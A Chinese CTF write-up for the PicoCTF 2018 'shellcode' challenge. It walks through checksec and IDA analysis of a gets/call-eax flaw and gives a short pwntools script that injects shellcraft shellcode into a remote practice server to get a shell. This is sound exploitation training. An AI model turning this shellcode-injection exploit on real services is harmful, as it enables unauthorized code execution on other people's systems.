当前位置: 首页 > news >正文

PWN手的成长之路-04-PicoCTF_2018_shellcode

image

先 nc 连接服务器,交互一下看看有什么效果。发现是让我们输入一个字符,之后程序再打印出来。
image

file 查看文件。32位的 ELF 可执行文件。
image

checksec 查看文件安全属性。没开任何保护。
image
NX 保护未开启,表明栈内存可被注入并执行任意机器码(shellcode),符合经典栈溢出利用的条件。此类漏洞通常需构造包含 /bin/bash 字符串的 shellcode 以获取交互式 shell 。

IDA打开此文件。因为代码被混淆了,导致无法反编译成伪代码,所以需要逐条分析汇编指令。
image

main 函数旁边看到了一个 vuln 函数,查看。发现了 gets 高危函数。
image

仔细查看 main 函数。
image
程序将用户的输入数据存储到 edp+var_A0 处,并通过 lea 将输入缓冲区地址加载至 eax 寄存器,随后作为参数传递给 vuln 函数,vuln 函数内存在关键指令 call eax,表明程序会直接跳转执行 eax 指向的地址,推测此处可能会存在任意代码执行漏洞。

image

反编译 vuln 函数,猜测 a1 会被加载到 eax 寄存器中。
image
因此用户输入的数据最终会被 call eax 执行因此需要构造一段机器码形式的shellcode,直接注入到栈中实现任意代码执行。

exp 构造思路:
构造包含 /bin/bash 字符串及系统调用执行的 shellcode,通过输入将其注入栈中,并利用call eax 触发执行,之后get shell。

from pwn import *  r=remote('node5.buuoj.cn',26081)  
context.log_level='debug'  
context.arch='i386'  
context.os='linux'  
shellcode=asm(shellcraft.sh())  
print(shellcode)  
r.send(shellcode)  
r.interactive()

最终得到交互式 shell
image

http://www.jsqmd.com/news/6206/

相关文章:

  • test5
  • 最高人民法院新劳动争议司法解释一 理解与适用
  • day14 课程()
  • 详细介绍:网络安全隔离技术解析:从网闸到光闸的进化之路
  • 逆元 组合数问题
  • 一、驱动基础知识速览(迅为RK3568)
  • 基于KingbaseES集群管理实战:从部署运维到高可用架构深度解析 - 实践
  • CF868F题解
  • ThinkPHP反序列化分析
  • AT_iroha2019_day4_l 题解
  • 2025.9.29
  • AtCoder AGC073 A 题解
  • Bilibili音频播放器开发 2025-9-29
  • 防爬虫逆向日志爆炸,精简追踪不崩浏览器控制台 - 详解
  • 使用 Jenkins 的流水线方案实施 CI/CD
  • 递增子序列笔记
  • MonoDETR(2)
  • 记录---window.close()失效 + Chrome浏览器调试线上代码
  • 启发式合并 [USACO22DEC] Making Friends P
  • 加密的病例单
  • 【多线程】什么是原子操作(Atomic Operation)? - 详解
  • 详细介绍:视频融合平台EasyCVR构筑智慧交通可视化管理与智能决策中枢
  • docker 在x86上build arm 镜像
  • 9.29软工
  • 不一样的.NET烟火,基于Roslyn的开源代码生成器
  • 详细介绍:深入浅出 XSS — 从原理到实战与防护
  • vxe-table 数据量过大时切换空白
  • 复刻江协旋钮控制模块
  • 第三方控件库的添加和使用
  • 实用指南:基于 HTML、CSS 和 JavaScript 的智能图像灰度直方图匹配系统